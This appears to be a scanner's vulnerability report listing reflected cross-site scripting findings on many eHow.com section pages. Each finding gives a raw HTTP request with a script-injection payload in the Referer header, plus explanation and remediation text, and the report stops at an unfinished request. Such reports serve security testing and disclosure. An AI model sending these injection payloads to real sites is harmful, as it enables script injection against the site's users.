<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow Mobile | "How to do Almost Everything" by Ce ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8810</script><script>alert(1)</script>75cdd571dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-money/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=a8810</script><script>alert(1)</script>75cdd571dc
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:17 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46804
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1092</script><script>alert(1)</script>7a563d731ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-style/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=b1092</script><script>alert(1)</script>7a563d731ac
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:17 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45321
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2780c</script><script>alert(1)</script>12a8c6bf20b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-tax-time/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=2780c</script><script>alert(1)</script>12a8c6bf20b
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:17 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43203
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44044</script><script>alert(1)</script>01615995bf6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /electronics/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=44044</script><script>alert(1)</script>01615995bf6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:08 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71007
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Electronics - How To Information | eHow.com</titl ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8064d</script><script>alert(1)</script>7e97a32cd8a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /family-health/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=8064d</script><script>alert(1)</script>7e97a32cd8a
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:08 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72112
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Family Health - How To Information | eHow.com</ti ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2b8c</script><script>alert(1)</script>0b3ee37394 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fashion-and-style/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=c2b8c</script><script>alert(1)</script>0b3ee37394
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:11 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71991
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Fashion & Style - How To Information | eHow.com</ ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12566</script><script>alert(1)</script>82ca7391521 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fitness/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=12566</script><script>alert(1)</script>82ca7391521
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:09 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71749
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Fitness - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ac4</script><script>alert(1)</script>4b44af2fc08 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /flu-season/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=d8ac4</script><script>alert(1)</script>4b44af2fc08
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:17:16 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 63751
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3116a</script><script>alert(1)</script>90cca8209f8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /food-and-drink/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=3116a</script><script>alert(1)</script>90cca8209f8
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:10 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73304
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Food & Drink - How To Information | eHow.com</tit ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccef8</script><script>alert(1)</script>5bcf79e4aec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=ccef8</script><script>alert(1)</script>5bcf79e4aec
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:29 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22442
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ddff</script><script>alert(1)</script>7de5c8273d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /groups.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=5ddff</script><script>alert(1)</script>7de5c8273d8
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:23 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22896
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abdc2</script><script>alert(1)</script>26163dc8dc4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /healthcare/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=abdc2</script><script>alert(1)</script>26163dc8dc4
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:30 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71315
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Healthcare - How To Information | eHow.com</title ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d42a7</script><script>alert(1)</script>0fa77f5b04 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /healthy-living/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=d42a7</script><script>alert(1)</script>0fa77f5b04
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:29 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71896
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Healthy Living - How To Information | eHow.com</t ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc77a</script><script>alert(1)</script>a68361c09e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hobbies-and-science/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=dc77a</script><script>alert(1)</script>a68361c09e5
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:30 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72434
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Hobbies & Science - How To Information | eHow.com ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ba25</script><script>alert(1)</script>b5ee88d9cea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /holidays-and-celebrations/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=5ba25</script><script>alert(1)</script>b5ee88d9cea
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:30 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73341
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Holidays & Celebrations - How To Information | eH ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f166c</script><script>alert(1)</script>a4a00c14a49 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-building-and-remodeling/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=f166c</script><script>alert(1)</script>a4a00c14a49
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:30 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72269
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Building & Remodeling - How To Information | ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3f72</script><script>alert(1)</script>a019290626d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
